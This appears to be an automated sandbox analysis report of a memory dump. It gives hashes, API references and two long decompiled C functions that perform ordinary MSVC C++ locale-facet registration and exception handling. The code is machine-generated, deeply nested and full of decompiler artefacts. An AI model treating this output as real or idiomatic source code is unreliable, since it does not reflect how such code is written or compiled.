Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: nm
API String ID: 651022567-2988067050
Opcode ID: e076666506da71825cd2bd9ef941970a8d1c60ff76639d3ad754e272249b7da6
Instruction ID: 54befaea2db2728a0bb4802151e3bdb625ca81c9a704962b68d8e6a1e9369386
Opcode Fuzzy Hash: e076666506da71825cd2bd9ef941970a8d1c60ff76639d3ad754e272249b7da6
Instruction Fuzzy Hash: F911A075808619DBCF05FBA4C840AFEB775AF44358F270519F511AB290DF74AA018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF4C1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF4C1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t195;
				signed int _t196;
				void* _t208;
				void* _t221;
				void* _t234;
				void* _t247;
				void* _t260;
				void* _t273;
				void* _t286;
				void* _t299;
				void* _t312;
				void* _t325;
				void* _t338;
				void* _t351;
				signed int _t511;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				signed int _t576;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				void* _t594;

				_t551 = __edx;
				_t420 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t594 - 0x14, 0);
				_t567 =  *0x6de96dc0; // 0x0
				 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
				 *(_t594 - 0x10) = _t567;
				_t195 = E6DDB161C(0x6de96d74);
				_t423 =  *((intOrPtr*)(_t594 + 8));
				_t196 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t195);
				_t553 = _t196;
				if(_t196 != 0) {
					L5:
					E6DDD66BA(_t594 - 0x14);
					return E6DDF0075(_t553);
				} else {
					if(_t567 == 0) {
						_push( *((intOrPtr*)(_t594 + 8)));
						_push(_t594 - 0x10);
						__eflags = E6DDE10BF(__ebx, _t423, __edx, _t553, _t567) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t594 - 0x20);
							E6DDF3D74(_t594 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t553, _t567, 0x14);
							E6DDD6653(_t594 - 0x14, 0);
							_t568 =  *0x6de96df8; // 0x0
							 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
							 *(_t594 - 0x10) = _t568;
							_t208 = E6DDB161C(0x6de96da4);
							_t430 =  *((intOrPtr*)(_t594 + 8));
							_t554 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t208);
							__eflags = _t554;
							if(_t554 != 0) {
								L12:
								E6DDD66BA(_t594 - 0x14);
								return E6DDF0075(_t554);
							} else {
								__eflags = _t568;
								if(_t568 == 0) {
									_push( *((intOrPtr*)(_t594 + 8)));
									_push(_t594 - 0x10);
									__eflags = E6DDE1127(_t420, _t430, __edx, _t554, _t568) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t594 - 0x20);
										E6DDF3D74(_t594 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t420, _t554, _t568, 0x14);
										E6DDD6653(_t594 - 0x14, 0);
										_t569 =  *0x6de96df4; // 0x0
										 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
										 *(_t594 - 0x10) = _t569;
										_t221 = E6DDB161C(0x6de96da0);
										_t437 =  *((intOrPtr*)(_t594 + 8));
										_t555 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t221);
										__eflags = _t555;
										if(_t555 != 0) {
											L19:
											E6DDD66BA(_t594 - 0x14);
											return E6DDF0075(_t555);
										} else {
											__eflags = _t569;
											if(_t569 == 0) {
												_push( *((intOrPtr*)(_t594 + 8)));
												_push(_t594 - 0x10);
												__eflags = E6DDE11AB(_t420, _t437, __edx, _t555, _t569) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t594 - 0x20);
													E6DDF3D74(_t594 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t420, _t555, _t569, 0x14);
													E6DDD6653(_t594 - 0x14, 0);
													_t570 =  *0x6de96dc8; // 0x0
													 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
													 *(_t594 - 0x10) = _t570;
													_t234 = E6DDB161C(0x6de96d7c);
													_t444 =  *((intOrPtr*)(_t594 + 8));
													_t556 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t234);
													__eflags = _t556;
													if(_t556 != 0) {
														L26:
														E6DDD66BA(_t594 - 0x14);
														return E6DDF0075(_t556);
													} else {
														__eflags = _t570;
														if(_t570 == 0) {
															_push( *((intOrPtr*)(_t594 + 8)));
															_push(_t594 - 0x10);
															__eflags = E6DDE1230(_t420, _t444, _t551, _t556, _t570) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t594 - 0x20);
																E6DDF3D74(_t594 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t420, _t556, _t570, 0x14);
																E6DDD6653(_t594 - 0x14, 0);
																_t571 =  *0x6de96dc4; // 0x0
																 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																 *(_t594 - 0x10) = _t571;
																_t247 = E6DDB161C(0x6de96d78);
																_t451 =  *((intOrPtr*)(_t594 + 8));
																_t557 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t247);
																__eflags = _t557;
																if(_t557 != 0) {
																	L33:
																	E6DDD66BA(_t594 - 0x14);
																	return E6DDF0075(_t557);
																} else {
																	__eflags = _t571;
																	if(_t571 == 0) {
																		_push( *((intOrPtr*)(_t594 + 8)));
																		_push(_t594 - 0x10);
																		__eflags = E6DDE12B4(_t420, _t451, _t551, _t557, _t571) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t594 - 0x20);
																			E6DDF3D74(_t594 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t420, _t557, _t571, 0x14);
																			E6DDD6653(_t594 - 0x14, 0);
																			_t572 =  *0x6de96dd8; // 0x0
																			 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																			 *(_t594 - 0x10) = _t572;
																			_t260 = E6DDB161C(0x6de96d84);
																			_t458 =  *((intOrPtr*)(_t594 + 8));
																			_t558 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t260);
																			__eflags = _t558;
																			if(_t558 != 0) {
																				L40:
																				E6DDD66BA(_t594 - 0x14);
																				return E6DDF0075(_t558);
																			} else {
																				__eflags = _t572;
																				if(_t572 == 0) {
																					_push( *((intOrPtr*)(_t594 + 8)));
																					_push(_t594 - 0x10);
																					__eflags = E6DDE1339(_t420, _t458, _t551, _t558, _t572) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t594 - 0x20);
																						E6DDF3D74(_t594 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t420, _t558, _t572, 0x14);
																						E6DDD6653(_t594 - 0x14, 0);
																						_t573 =  *0x6de96db0; // 0x0
																						 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																						 *(_t594 - 0x10) = _t573;
																						_t273 = E6DDB161C(0x6de96d64);
																						_t465 =  *((intOrPtr*)(_t594 + 8));
																						_t559 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t273);
																						__eflags = _t559;
																						if(_t559 != 0) {
																							L47:
																							E6DDD66BA(_t594 - 0x14);
																							return E6DDF0075(_t559);
																						} else {
																							__eflags = _t573;
																							if(_t573 == 0) {
																								_push( *((intOrPtr*)(_t594 + 8)));
																								_push(_t594 - 0x10);
																								__eflags = E6DDE13A1(_t420, _t465, _t551, _t559, _t573) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t594 - 0x20);
																									E6DDF3D74(_t594 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t420, _t559, _t573, 0x14);
																									E6DDD6653(_t594 - 0x14, 0);
																									_t574 =  *0x6de96ddc; // 0x0
																									 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																									 *(_t594 - 0x10) = _t574;
																									_t286 = E6DDB161C(0x6de96d88);
																									_t472 =  *((intOrPtr*)(_t594 + 8));
																									_t560 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t286);
																									__eflags = _t560;
																									if(_t560 != 0) {
																										L54:
																										E6DDD66BA(_t594 - 0x14);
																										return E6DDF0075(_t560);
																									} else {
																										__eflags = _t574;
																										if(_t574 == 0) {
																											_push( *((intOrPtr*)(_t594 + 8)));
																											_push(_t594 - 0x10);
																											__eflags = E6DDE1409(_t420, _t472, _t551, _t560, _t574) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t594 - 0x20);
																												E6DDF3D74(_t594 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t420, _t560, _t574, 0x14);
																												E6DDD6653(_t594 - 0x14, 0);
																												_t575 =  *0x6de96de0; // 0x0
																												 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																												 *(_t594 - 0x10) = _t575;
																												_t299 = E6DDB161C(0x6de96d8c);
																												_t479 =  *((intOrPtr*)(_t594 + 8));
																												_t561 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t299);
																												__eflags = _t561;
																												if(_t561 != 0) {
																													L61:
																													E6DDD66BA(_t594 - 0x14);
																													return E6DDF0075(_t561);
																												} else {
																													__eflags = _t575;
																													if(_t575 == 0) {
																														_push( *((intOrPtr*)(_t594 + 8)));
																														_push(_t594 - 0x10);
																														__eflags = E6DDE1471(_t420, _t479, _t551, _t561, _t575) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t594 - 0x20);
																															E6DDF3D74(_t594 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t420, _t561, _t575, 0x14);
																															E6DDD6653(_t594 - 0x14, 0);
																															_t576 =  *0x6de96dfc; // 0x0
																															 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																															 *(_t594 - 0x10) = _t576;
																															_t312 = E6DDB161C(0x6de96da8);
																															_t486 =  *((intOrPtr*)(_t594 + 8));
																															_t562 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t312);
																															__eflags = _t562;
																															if(_t562 != 0) {
																																L68:
																																E6DDD66BA(_t594 - 0x14);
																																return E6DDF0075(_t562);
																															} else {
																																__eflags = _t576;
																																if(_t576 == 0) {
																																	_push( *((intOrPtr*)(_t594 + 8)));
																																	_push(_t594 - 0x10);
																																	__eflags = E6DDE14EC(_t420, _t486, _t551, _t562, _t576) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t594 - 0x20);
																																		E6DDF3D74(_t594 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t420, _t562, _t576, 0x14);
																																		E6DDD6653(_t594 - 0x14, 0);
																																		_t577 =  *0x6de96dcc; // 0x0
																																		 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																		 *(_t594 - 0x10) = _t577;
																																		_t325 = E6DDB161C(0x6de96d80);
																																		_t493 =  *((intOrPtr*)(_t594 + 8));
																																		_t563 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t325);
																																		__eflags = _t563;
																																		if(_t563 != 0) {
																																			L75:
																																			E6DDD66BA(_t594 - 0x14);
																																			return E6DDF0075(_t563);
																																		} else {
																																			__eflags = _t577;
																																			if(_t577 == 0) {
																																				_push( *((intOrPtr*)(_t594 + 8)));
																																				_push(_t594 - 0x10);
																																				__eflags = E6DDE1558(_t420, _t493, _t551, _t563, _t577) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t594 - 0x20);
																																					E6DDF3D74(_t594 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t420, _t563, _t577, 0x14);
																																					E6DDD6653(_t594 - 0x14, 0);
																																					_t578 =  *0x6de96e00; // 0x0
																																					 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																					 *(_t594 - 0x10) = _t578;
																																					_t338 = E6DDB161C(0x6de96dac);
																																					_t500 =  *((intOrPtr*)(_t594 + 8));
																																					_t564 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t338);
																																					__eflags = _t564;
																																					if(_t564 != 0) {
																																						L82:
																																						E6DDD66BA(_t594 - 0x14);
																																						return E6DDF0075(_t564);
																																					} else {
																																						__eflags = _t578;
																																						if(_t578 == 0) {
																																							_push( *((intOrPtr*)(_t594 + 8)));
																																							_push(_t594 - 0x10);
																																							__eflags = E6DDE15C4(_t420, _t500, _t551, _t564, _t578) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t594 - 0x20);
																																								E6DDF3D74(_t594 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t420, _t564, _t578, 0x14);
																																								E6DDD6653(_t594 - 0x14, 0);
																																								_t579 =  *0x6de96dd0; // 0x0
																																								 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																								 *(_t594 - 0x10) = _t579;
																																								_t351 = E6DDB161C(0x6de96d60);
																																								_t507 =  *((intOrPtr*)(_t594 + 8));
																																								_t565 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t351);
																																								__eflags = _t565;
																																								if(_t565 != 0) {
																																									L89:
																																									E6DDD66BA(_t594 - 0x14);
																																									return E6DDF0075(_t565);
																																								} else {
																																									__eflags = _t579;
																																									if(_t579 == 0) {
																																										_push( *((intOrPtr*)(_t594 + 8)));
																																										_push(_t594 - 0x10);
																																										__eflags = E6DDE162A(_t420, _t507, _t551, _t565, _t579) - 0xffffffff;
																																										if(__eflags == 0) {
																																											_t511 = _t594 - 0x20;
																																											E6DDB1438(_t511);
																																											E6DDF3D74(_t594 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de3851f, _t420, _t565, _t579, 4);
																																											_t580 = _t511;
																																											 *(_t594 - 0x10) = _t580;
																																											 *((intOrPtr*)(_t580 + 4)) =  *((intOrPtr*)(_t594 + 0xc));
																																											_push( *((intOrPtr*)(_t594 + 0x14)));
																																											_t189 = _t594 - 4;
																																											 *_t189 =  *(_t594 - 4) & 0x00000000;
																																											__eflags =  *_t189;
																																											 *_t580 = 0x6de3c0c4;
																																											 *((char*)(_t580 + 0x28)) =  *((intOrPtr*)(_t594 + 0x10));
																																											E6DDE542F(_t420, _t511, _t551, _t565, _t580,  *_t189);
																																											return E6DDF0075(_t580,  *((intOrPtr*)(_t594 + 8)));
																																										} else {
																																											_t565 =  *(_t594 - 0x10);
																																											 *(_t594 - 0x10) = _t565;
																																											 *(_t594 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t565);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t565 + 4))))();
																																											 *0x6de96dd0 = _t565;
																																											goto L89;
																																										}
																																									} else {
																																										_t565 = _t579;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t564 =  *(_t594 - 0x10);
																																								 *(_t594 - 0x10) = _t564;
																																								 *(_t594 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t564);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t564 + 4))))();
																																								 *0x6de96e00 = _t564;
																																								goto L82;
																																							}
																																						} else {
																																							_t564 = _t578;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t563 =  *(_t594 - 0x10);
																																					 *(_t594 - 0x10) = _t563;
																																					 *(_t594 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t563);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t563 + 4))))();
																																					 *0x6de96dcc = _t563;
																																					goto L75;
																																				}
																																			} else {
																																				_t563 = _t577;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t562 =  *(_t594 - 0x10);
																																		 *(_t594 - 0x10) = _t562;
																																		 *(_t594 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t562);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t562 + 4))))();
																																		 *0x6de96dfc = _t562;
																																		goto L68;
																																	}
																																} else {
																																	_t562 = _t576;
																																	goto L68;
																																}
																															}
																														} else {
																															_t561 =  *(_t594 - 0x10);
																															 *(_t594 - 0x10) = _t561;
																															 *(_t594 - 4) = 1;
																															E6DDD6FD3(__eflags, _t561);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t561 + 4))))();
																															 *0x6de96de0 = _t561;
																															goto L61;
																														}
																													} else {
																														_t561 = _t575;
																														goto L61;
																													}
																												}
																											} else {
																												_t560 =  *(_t594 - 0x10);
																												 *(_t594 - 0x10) = _t560;
																												 *(_t594 - 4) = 1;
																												E6DDD6FD3(__eflags, _t560);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t560 + 4))))();
																												 *0x6de96ddc = _t560;
																												goto L54;
																											}
																										} else {
																											_t560 = _t574;
																											goto L54;
																										}
																									}
																								} else {
																									_t559 =  *(_t594 - 0x10);
																									 *(_t594 - 0x10) = _t559;
																									 *(_t594 - 4) = 1;
																									E6DDD6FD3(__eflags, _t559);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t559 + 4))))();
																									 *0x6de96db0 = _t559;
																									goto L47;
																								}
																							} else {
																								_t559 = _t573;
																								goto L47;
																							}
																						}
																					} else {
																						_t558 =  *(_t594 - 0x10);
																						 *(_t594 - 0x10) = _t558;
																						 *(_t594 - 4) = 1;
																						E6DDD6FD3(__eflags, _t558);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t558 + 4))))();
																						 *0x6de96dd8 = _t558;
																						goto L40;
																					}
																				} else {
																					_t558 = _t572;
																					goto L40;
																				}
																			}
																		} else {
																			_t557 =  *(_t594 - 0x10);
																			 *(_t594 - 0x10) = _t557;
																			 *(_t594 - 4) = 1;
																			E6DDD6FD3(__eflags, _t557);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t557 + 4))))();
																			 *0x6de96dc4 = _t557;
																			goto L33;
																		}
																	} else {
																		_t557 = _t571;
																		goto L33;
																	}
																}
															} else {
																_t556 =  *(_t594 - 0x10);
																 *(_t594 - 0x10) = _t556;
																 *(_t594 - 4) = 1;
																E6DDD6FD3(__eflags, _t556);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t556 + 4))))();
																 *0x6de96dc8 = _t556;
																goto L26;
															}
														} else {
															_t556 = _t570;
															goto L26;
														}
													}
												} else {
													_t555 =  *(_t594 - 0x10);
													 *(_t594 - 0x10) = _t555;
													 *(_t594 - 4) = 1;
													E6DDD6FD3(__eflags, _t555);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t555 + 4))))();
													 *0x6de96df4 = _t555;
													goto L19;
												}
											} else {
												_t555 = _t569;
												goto L19;
											}
										}
									} else {
										_t554 =  *(_t594 - 0x10);
										 *(_t594 - 0x10) = _t554;
										 *(_t594 - 4) = 1;
										E6DDD6FD3(__eflags, _t554);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t554 + 4))))();
										 *0x6de96df8 = _t554;
										goto L12;
									}
								} else {
									_t554 = _t568;
									goto L12;
								}
							}
						} else {
							_t553 =  *(_t594 - 0x10);
							 *(_t594 - 0x10) = _t553;
							 *(_t594 - 4) = 1;
							E6DDD6FD3(__eflags, _t553);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t553 + 4))))();
							 *0x6de96dc0 = _t553;
							goto L5;
						}
					} else {
						_t553 = _t567;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF4C8
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF4D2
int.LIBCPMT ref: 6DDDF4E9

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF523
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF543
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF561

Strings

tmm, xrefs: 6DDDF4DD

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: tmm
API String ID: 651022567-1655011547
Opcode ID: ef4dae80be6afb63bae7d183a4a7cf0ae4c49842148bd35671b58455be3686b1
Instruction ID: 04b0e9c5804c72bd30fb6fa115ceb5daa9c8730ee870e3d493466d63634b3085
Opcode Fuzzy Hash: ef4dae80be6afb63bae7d183a4a7cf0ae4c49842148bd35671b58455be3686b1
Instruction Fuzzy Hash: 6311A075908119DBCF01FB64C840AFDB775AF44318F260109F621AB290DF749A058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF375, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF375(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t223;
				signed int _t224;
				void* _t236;
				void* _t249;
				void* _t262;
				void* _t275;
				void* _t288;
				void* _t301;
				void* _t314;
				void* _t327;
				void* _t340;
				void* _t353;
				void* _t366;
				void* _t379;
				void* _t392;
				void* _t405;
				signed int _t587;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				void* _t682;

				_t633 = __edx;
				_t482 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t682 - 0x14, 0);
				_t651 =  *0x6de96dbc; // 0x0
				 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
				 *(_t682 - 0x10) = _t651;
				_t223 = E6DDB161C(0x6de96d70);
				_t485 =  *((intOrPtr*)(_t682 + 8));
				_t224 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t223);
				_t635 = _t224;
				if(_t224 != 0) {
					L5:
					E6DDD66BA(_t682 - 0x14);
					return E6DDF0075(_t635);
				} else {
					if(_t651 == 0) {
						_push( *((intOrPtr*)(_t682 + 8)));
						_push(_t682 - 0x10);
						__eflags = E6DDE0FEF(__ebx, _t485, __edx, _t635, _t651) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t682 - 0x20);
							E6DDF3D74(_t682 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t635, _t651, 0x14);
							E6DDD6653(_t682 - 0x14, 0);
							_t652 =  *0x6de96df0; // 0x0
							 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
							 *(_t682 - 0x10) = _t652;
							_t236 = E6DDB161C(0x6de96d9c);
							_t492 =  *((intOrPtr*)(_t682 + 8));
							_t636 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t236);
							__eflags = _t636;
							if(_t636 != 0) {
								L12:
								E6DDD66BA(_t682 - 0x14);
								return E6DDF0075(_t636);
							} else {
								__eflags = _t652;
								if(_t652 == 0) {
									_push( *((intOrPtr*)(_t682 + 8)));
									_push(_t682 - 0x10);
									__eflags = E6DDE1057(_t482, _t492, __edx, _t636, _t652) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t682 - 0x20);
										E6DDF3D74(_t682 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t482, _t636, _t652, 0x14);
										E6DDD6653(_t682 - 0x14, 0);
										_t653 =  *0x6de96dc0; // 0x0
										 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
										 *(_t682 - 0x10) = _t653;
										_t249 = E6DDB161C(0x6de96d74);
										_t499 =  *((intOrPtr*)(_t682 + 8));
										_t637 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t249);
										__eflags = _t637;
										if(_t637 != 0) {
											L19:
											E6DDD66BA(_t682 - 0x14);
											return E6DDF0075(_t637);
										} else {
											__eflags = _t653;
											if(_t653 == 0) {
												_push( *((intOrPtr*)(_t682 + 8)));
												_push(_t682 - 0x10);
												__eflags = E6DDE10BF(_t482, _t499, __edx, _t637, _t653) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t682 - 0x20);
													E6DDF3D74(_t682 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t482, _t637, _t653, 0x14);
													E6DDD6653(_t682 - 0x14, 0);
													_t654 =  *0x6de96df8; // 0x0
													 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
													 *(_t682 - 0x10) = _t654;
													_t262 = E6DDB161C(0x6de96da4);
													_t506 =  *((intOrPtr*)(_t682 + 8));
													_t638 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t262);
													__eflags = _t638;
													if(_t638 != 0) {
														L26:
														E6DDD66BA(_t682 - 0x14);
														return E6DDF0075(_t638);
													} else {
														__eflags = _t654;
														if(_t654 == 0) {
															_push( *((intOrPtr*)(_t682 + 8)));
															_push(_t682 - 0x10);
															__eflags = E6DDE1127(_t482, _t506, _t633, _t638, _t654) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t682 - 0x20);
																E6DDF3D74(_t682 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t482, _t638, _t654, 0x14);
																E6DDD6653(_t682 - 0x14, 0);
																_t655 =  *0x6de96df4; // 0x0
																 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																 *(_t682 - 0x10) = _t655;
																_t275 = E6DDB161C(0x6de96da0);
																_t513 =  *((intOrPtr*)(_t682 + 8));
																_t639 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t275);
																__eflags = _t639;
																if(_t639 != 0) {
																	L33:
																	E6DDD66BA(_t682 - 0x14);
																	return E6DDF0075(_t639);
																} else {
																	__eflags = _t655;
																	if(_t655 == 0) {
																		_push( *((intOrPtr*)(_t682 + 8)));
																		_push(_t682 - 0x10);
																		__eflags = E6DDE11AB(_t482, _t513, _t633, _t639, _t655) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t682 - 0x20);
																			E6DDF3D74(_t682 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t482, _t639, _t655, 0x14);
																			E6DDD6653(_t682 - 0x14, 0);
																			_t656 =  *0x6de96dc8; // 0x0
																			 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																			 *(_t682 - 0x10) = _t656;
																			_t288 = E6DDB161C(0x6de96d7c);
																			_t520 =  *((intOrPtr*)(_t682 + 8));
																			_t640 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t288);
																			__eflags = _t640;
																			if(_t640 != 0) {
																				L40:
																				E6DDD66BA(_t682 - 0x14);
																				return E6DDF0075(_t640);
																			} else {
																				__eflags = _t656;
																				if(_t656 == 0) {
																					_push( *((intOrPtr*)(_t682 + 8)));
																					_push(_t682 - 0x10);
																					__eflags = E6DDE1230(_t482, _t520, _t633, _t640, _t656) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t682 - 0x20);
																						E6DDF3D74(_t682 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t482, _t640, _t656, 0x14);
																						E6DDD6653(_t682 - 0x14, 0);
																						_t657 =  *0x6de96dc4; // 0x0
																						 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																						 *(_t682 - 0x10) = _t657;
																						_t301 = E6DDB161C(0x6de96d78);
																						_t527 =  *((intOrPtr*)(_t682 + 8));
																						_t641 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t301);
																						__eflags = _t641;
																						if(_t641 != 0) {
																							L47:
																							E6DDD66BA(_t682 - 0x14);
																							return E6DDF0075(_t641);
																						} else {
																							__eflags = _t657;
																							if(_t657 == 0) {
																								_push( *((intOrPtr*)(_t682 + 8)));
